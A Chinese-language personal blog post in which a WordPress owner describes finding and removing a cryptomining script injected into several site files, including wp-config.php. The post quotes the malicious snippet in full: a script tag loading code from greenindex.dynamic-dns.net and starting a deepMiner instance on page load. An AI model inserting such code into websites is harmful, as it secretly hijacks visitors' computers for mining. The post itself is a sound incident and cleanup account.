前几天注意到网站后台有些程序不是很正常,比如删除插件的时候会给出一个错误信息,但是插件也能被删除,后来注意到错误信息里有dynamic-dns.net的网址,就有点奇怪了,怎么会在wordpress里有这么个网站信息,然后再仔细看错误信息,有deepminer的字样,直接翻译的话,叫“深度矿工”,这个miner现在太热门了,因为各种虚拟币都是需要miner(矿工)来挖矿。

后来拿Wordfence来查,它也工作不正常。

然后今天发现,居然媒体库都无法以Grid方式显示了,只能以List方式显示。查了半天,后来把debug打开,

  • define( ‘WP_DEBUG’, true );
  • define( ‘WP_DEBUG_DISPLAY’, true );

然后挨个去关闭插件找问题,也没找到原因。

随手就做了个网站的导出操作,算是临时备份,结果打开这个导出的xml文件,发现前面居然是这么一串东西:

这一看就是有问题了。

各种搜索了以后,确定是被挂了挖矿木马。

用xshell登录到网站上,使用grep -r “greenindex”命令查找了一下,还好就下面几个文件被做了修改:

  • 404.html
  • index.html
  • wp-config.php
  • wordfence-waf.php

编辑这些文件,挨个去掉这些代码:

<script src=’https://greenindex.dynamic-dns.net/jqueryeasyui.js’></script>
<script>
var uri = ‘www’;
var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
jqueryui.start();
}
</script><?xml version=”1.0″ encoding=”UTF-8″ ?>

系统看起来正常了。

然后把这几个文件的属性给改成只读。

有时候觉得弄个网站真是不省心,本来想耍耍笔杆子写两篇文章,结果非要让你搞成个搞IT维护的。

相关文章